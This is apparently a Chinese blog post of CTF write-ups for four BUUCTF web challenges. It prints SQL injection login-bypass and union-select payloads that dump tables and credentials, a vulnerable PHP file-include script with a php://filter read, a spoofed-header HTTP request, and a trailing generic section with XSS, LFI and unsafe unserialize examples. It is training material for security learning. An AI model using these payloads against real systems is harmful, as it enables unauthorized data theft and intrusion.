buuctf web 第一页 第9题到第12题

[极客大挑战 2019]LoveSQL

一个万能密码秒了

1'or 1=1#

在这里插入图片描述
然后登录进去没flag
爆吧
一个简单的联合注入,没有过滤的

1'union select 1,2,3#
1'union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=database()),3#
geekuser,l0ve1ysq1!

1'union select 1,(select group_concat(column_name)from information_schema.columns where table_name='l0ve1ysq1'),3#
Hello id,username,password!

1'union select 1,(select group_concat(username,password)from l0ve1ysq1),3#

奇怪的是他把反引号给办了,我无语,反引号还用来绕过引号呢

[极客大挑战 2019]Secret File

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
啥都没看到
退回去抓包
在这里插入图片描述

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

方法很多

php://filter/read=convert.base64-encode/resource=flag.php

[极客大挑战 2019]Http

进地址就翻了跟头,我加了http结果不行,试了几次之后直接来成功了
在这里插入图片描述
没啥好说的

GET /Secret.php HTTP/1.1
Host: node5.buuoj.cn:26513
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36;Syclover
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
x-forwarded-for: 127.0.0.1
referer: https://Sycsecret.buuoj.cn
Connection: close

[极客大挑战 2019]Knife

在这里插入图片描述
不能直接RCE那么用antsword来进行操作

### BUUCTF Web目解思路和技巧 #### SQL注入漏洞检测与利用 对于SQL注入类型的挑战,在确认存在注入点之后,可以采用多种技术手段来进一步探索数据库结构并提取敏感信息。例如,在某些情况下,堆叠查询允许攻击者在同一请求中执行多个SQL语句[^5]。 ```sql 1&#39; UNION ALL SELECT NULL,&#39;<script>alert(1)</script>&#39;,NULL,NULL FROM information_schema.tables -- ``` 这段代码展示了如何通过联合查询的方式向目标应用发送恶意输入,从而可能触发跨站脚本(XSS)攻击或泄露其他有用的数据。 #### 文件包含漏洞的识别与利用 当遇到文件包含功能时,了解PHP处理这些请求的行为至关重要。如果应用程序使用了`include()` 或 `require()` 函数加载外部文件,则可能存在风险。特别是当用户能够控制传递给此类函数的参数时,就有可能导致远程文件包含(RFI)或本地文件包含(LFI)[^4]。 为了绕过限制访问特定文件路径的安全措施,可以尝试利用PHP伪协议(`php://filter`)对文件内容进行转换: ```bash http://example.com/vuln.php?page=php://filter/convert.base64-encode/resource=config.inc.php ``` 此命令将把配置文件的内容编码成Base64格式返回给客户端浏览器,使得即使服务器试图阻止直接读取该文件也成为可能。 #### 序列化与反序列化的安全考量 在涉及对象操作的应用程序环境中,应当特别注意防止不信任来源提供的数据被用来创建实例。这是因为一旦成功实现了不受控的对象初始化过程,便能轻易地操纵内部状态甚至调用任意方法。因此,务必验证所有来自用户的输入,并采取适当的方法对其进行清理以确保安全性[^2]。 考虑下面这个简单的例子,它演示了一个潜在危险场景下不当使用的后果: ```php <?php class User { public $name; function __destruct() { echo "User name is {$this->name}"; } } // 不要这样做!容易受到攻击者的操控。 unserialize($_GET[&#39;data&#39;]); ?> ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值